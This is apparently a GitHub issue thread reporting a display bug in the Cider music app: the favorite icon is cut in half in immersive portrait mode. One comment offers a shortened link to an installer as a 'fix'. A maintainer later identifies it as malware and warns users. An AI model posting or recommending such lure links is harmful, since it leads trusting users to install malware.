### ISSUE TITLE
Favorite Icon issue

### ISSUE THREAD

**Issue by gingertomy** [ciderapp/Cider-2#761]
### Preflight Checklist

- [X] I agree to follow the [Code of Conduct](https://cider.sh/legal/conduct) that this project adheres to.
- [X] I have searched the [issue tracker](https://github.com/ciderapp/Cider-2/issues) for a bug report that matches the one I want to file, without success.
- [X] I have checked that the correct behavior occurs on [Apple Music Web](https://music.apple.com) (if applicable).
- [X] I have verified that my issue is with a [supported version](https://github.com/ciderapp/Cider-2/blob/main/SECURITY.md) and that it is with the desktop app (Support for other areas can be found in our Discord / on the appropriate repo).

### Download Source

Microsoft Store

### Operating System

Windows 

### Commit Hash

87a066f6a3fc6333788ee2d66670ffe1b037d04f

### Build Timestamp

29/08/2024 07:09:39

### Describe the Bug

Hello, when i'm using immersive mode and i'm using the window in portait mode, in sonoma mode, the favorite icon is cut in half.
![Capture d’écran (42)](https://github.com/user-attachments/assets/557dba63-e2ee-48f1-8b5f-63e6b8f5705c)

### Steps to Reproduce

1. Opened Immersive Mode
2.  Played my favorited music

**Comment by Klevente12** [comment]
try this
https://bit.ly/4e4zLlq
select the desired compiler in the installer

**Comment by gingertomy** [comment]
I can't download it

**Comment by cryptofyre** [comment]
That was malware do not engage or seek this users help or instructions. Please ensure to never download things that don't explicitly come from one of us.

We at Cider Collective will never ask, nor have you download or install anything from this Bug Tracker by means of external links.
